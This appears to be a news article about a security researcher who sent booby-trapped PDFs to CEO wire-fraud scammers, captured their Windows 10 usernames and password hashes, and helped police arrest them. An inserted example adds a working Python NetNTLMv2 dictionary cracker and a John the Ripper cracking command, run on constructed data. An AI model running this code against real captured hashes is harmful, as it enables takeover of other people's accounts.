HITB: Florian Lukavsky hacks criminals profiting from out-of-control, multi-billion-dollar CEO wire-transfer scams… and they hate him for it.
The director of SEC Consult’s Singapore office has made a name for himself by striking back at so-called “whaling” scammers: he sends them booby-trapped documents that, when opened on their Windows 10 machines, leak identifying information, which he passes on to police.
Whaling (the FBI files it under business email compromise) is a well-oiled social engineering scam in which criminals dupe financial controllers at large, lucrative organisations. The whalers’ main method is an email that appears to come from the chief executive, instructing the recipient to wire cash to a nominated bank account.
It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which wired $3m to a scammer’s Chinese bank account and recovered it only by luck; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.
They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.
Lukavsky spoke to The Reg about the work after presenting it at Hack in the Box in Singapore in August, where he explained that he turns the scammers’ own tactics against them to compromise their Microsoft accounts.
“Someone impersonated the CEO of an international company requesting urgent wire transfers and a couple of hours later they realise it was a scam … we worked together with law enforcement to trick the fraudsters,” Lukavsky says.
“We sent them a prepared PDF document pretending to be transaction confirmation and they opened it which led to Twitter handles, usernames, and identity information.”
“We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook.”
Those Windows 10 password hashes fall to a cracker such as John the Ripper within hours, provided the underlying password is weak; a long, random password would survive a dictionary or brute-force run, so the cracking step is only as good as the scammer’s password hygiene.
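As an added worked example of that cracking step (this is not the article’s or SEC Consult’s code): the script below assumes the captured material is a NetNTLMv2 challenge/response, the exchange a Windows client sends when it authenticates to a remote server and the format John the Ripper’s `netntlmv2` mode cracks; the article does not say which hash format Lukavsky obtained. The user name, domain, server challenge, blob, wordlist and both passwords are constructed for the example. MD4 is implemented inline because OpenSSL 3 builds of Python no longer expose it through `hashlib` by default.

```python
"""Dictionary attack on a captured NetNTLMv2 challenge/response.

Added example, not code from the article or from SEC Consult. It assumes the
capture is a NetNTLMv2 exchange (user, domain, server challenge, NTProofStr,
blob); the capture is constructed here from a made-up password so that the
script runs offline.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for the NT hash; absent from OpenSSL 3 by default)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: F, words in order, shifts 3/7/11/19
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, column order, constant 0x5A827999
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, bit-reversed order, constant 0x6ED9EBA1
            k = round3_order[i]
            a, b, c, d = d, _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16le"))


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as defined in MS-NLMP: HMAC-MD5 keyed with the NTLMv2 hash."""
    ident = (user.upper() + domain).encode("utf-16le")
    ntlmv2_key = hmac.new(nt_hash(password), ident, hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def build_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Constructed capture line in the layout John's netntlmv2 format reads:
    user::domain:serverchallenge:ntproofstr:blob (all hex)."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(capture: str, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute NTProofStr for each candidate; the first match is the password."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed inputs: an 8-byte server challenge and a minimal NTLMv2 client blob
# (response type 1/1, reserved, timestamp, client challenge, reserved, empty AV list).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "a0a1a2a3a4a5a6a7" + "00000000" + "00000000")
WORDLIST = ["123456", "password", "letmein", "Money2016!", "qwerty"]  # constructed
USER, DOMAIN = "scammer@outlook.com", "MicrosoftAccount"  # constructed identity


def demo():
    """Weak password falls to the wordlist; a long random one does not."""
    weak = build_capture(USER, DOMAIN, "Money2016!", SERVER_CHALLENGE, BLOB)
    strong = build_capture(USER, DOMAIN, "vQ7#kLp9!wX2m@Zr", SERVER_CHALLENGE, BLOB)
    return crack(weak, WORDLIST), crack(strong, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

With a real capture written to a file in the same `user::domain:challenge:proof:blob` layout, John the Ripper (jumbo build) does the same work with `john --format=netntlmv2 --wordlist=<list> <file>`; the strong-password case shows why the “few hours” claim only holds when the scammer picked a guessable password.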
The information Lukavsky passed to police from that attack late last year led to the arrest of the scammers, who were located in Africa.